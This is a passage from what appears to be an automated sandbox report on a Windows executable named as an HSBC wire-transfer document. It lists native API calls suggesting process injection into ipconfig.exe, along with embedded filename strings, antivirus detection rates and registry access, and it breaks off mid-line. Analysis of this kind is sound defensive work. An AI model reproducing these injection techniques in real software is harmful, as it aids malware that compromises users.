          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeCode function: 6_2_016696D0 NtCreateKey,6_2_016696D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A50 NtCreateFile,LdrInitializeThunk,16_2_03689A50
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_03689910
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899A0 NtCreateSection,LdrInitializeThunk,16_2_036899A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689860 NtQuerySystemInformation,LdrInitializeThunk,16_2_03689860
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689840 NtDelayExecution,LdrInitializeThunk,16_2_03689840
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689710 NtQueryInformationToken,LdrInitializeThunk,16_2_03689710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689FE0 NtCreateMutant,LdrInitializeThunk,16_2_03689FE0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689780 NtMapViewOfSection,LdrInitializeThunk,16_2_03689780
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_036896E0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036896D0 NtCreateKey,LdrInitializeThunk,16_2_036896D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689540 NtReadFile,LdrInitializeThunk,16_2_03689540
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895D0 NtClose,LdrInitializeThunk,16_2_036895D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689B00 NtSetValueKey,16_2_03689B00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A3B0 NtGetContextThread,16_2_0368A3B0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A20 NtResumeThread,16_2_03689A20
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A00 NtProtectVirtualMemory,16_2_03689A00
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A10 NtQuerySection,16_2_03689A10
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689A80 NtOpenDirectoryObject,16_2_03689A80
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689950 NtQueueApcThread,16_2_03689950
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036899D0 NtCreateProcessEx,16_2_036899D0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368B040 NtSuspendThread,16_2_0368B040
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689820 NtEnumerateKey,16_2_03689820
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898F0 NtReadVirtualMemory,16_2_036898F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036898A0 NtWriteVirtualMemory,16_2_036898A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689760 NtOpenProcess,16_2_03689760
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A770 NtOpenThread,16_2_0368A770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689770 NtSetInformationFile,16_2_03689770
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689730 NtQueryVirtualMemory,16_2_03689730
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368A710 NtOpenProcessToken,16_2_0368A710
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036897A0 NtUnmapViewOfSection,16_2_036897A0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689660 NtAllocateVirtualMemory,16_2_03689660
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689670 NtQueryInformationProcess,16_2_03689670
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689650 NtQueryValueKey,16_2_03689650
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689610 NtEnumerateValueKey,16_2_03689610
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689560 NtWriteFile,16_2_03689560
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_03689520 NtWaitForSingleObject,16_2_03689520
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_0368AD30 NtSetContextThread,16_2_0368AD30
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_036895F0 NtQueryInformationFile,16_2_036895F0
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A360 NtCreateFile,16_2_02C7A360
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A490 NtClose,16_2_02C7A490
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A410 NtReadFile,16_2_02C7A410
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A3B2 NtCreateFile,16_2_02C7A3B2
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 16_2_02C7A35A NtCreateFile,16_2_02C7A35A
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000000.278790638.0000000000456000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.293103917.0000000005CD0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.289914483.00000000028A1000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.292767031.0000000005850000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290051006.000000000296B000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameInnerException.dll" vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000000.00000002.290259549.00000000038AD000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dll@ vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000000.286928086.0000000000C76000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346567819.000000000171F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346749422.00000000018AF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exe, 00000006.00000002.346869714.0000000001997000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameipconfig.exej% vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeBinary or memory string: OriginalFilenameISectionEnt.exe. vs HSBC ... Wire Transfer Copy.exe
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: HSBC ... Wire Transfer Copy.exeVirustotal: Detection: 16%
          Source: HSBC ... Wire Transfer Copy.exeReversingLabs: Detection: 40%
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeFile read: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exe:Zone.IdentifierJump to behavior
          Source: HSBC ... Wire Transfer Copy.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\HSBC ... Wire Transfer Copy.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desk